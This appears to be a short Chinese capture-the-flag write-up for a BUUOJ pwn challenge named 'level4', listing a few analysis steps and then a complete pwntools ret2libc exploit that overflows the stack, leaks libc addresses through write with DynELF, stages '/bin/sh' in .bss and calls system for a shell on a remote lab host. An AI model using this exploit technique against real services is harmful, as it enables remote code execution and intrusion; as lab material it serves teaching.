1,三连
2,偏移
3,IDA静态查看是否有ret利用点
思路:ret2libc,泄露_write来获取Libc基址
4,ldd查看
5,payload
自动查Libc版本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from time import sleep
import sys
context.binary = "./level4"
elf = context.binary
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
if sys.argv[1] == "l":
io = process("./level4")
else:
io = remote('node4.buuoj.cn',28365)
def leak(addr):
payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
io.send(payload)
sleep(0.01)
leaked = io.recv(4)
info("leaked -> {}".format(leaked))
return leaked
d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')
success("system -> {:#x}".format(system_addr))
pause()
# gdb.attach(io)
payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)
io.send(payload)
sleep(0.01)
io.send("/bin/sh\0")
sleep(0.01)
payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
io.send(payload)
io.interactive()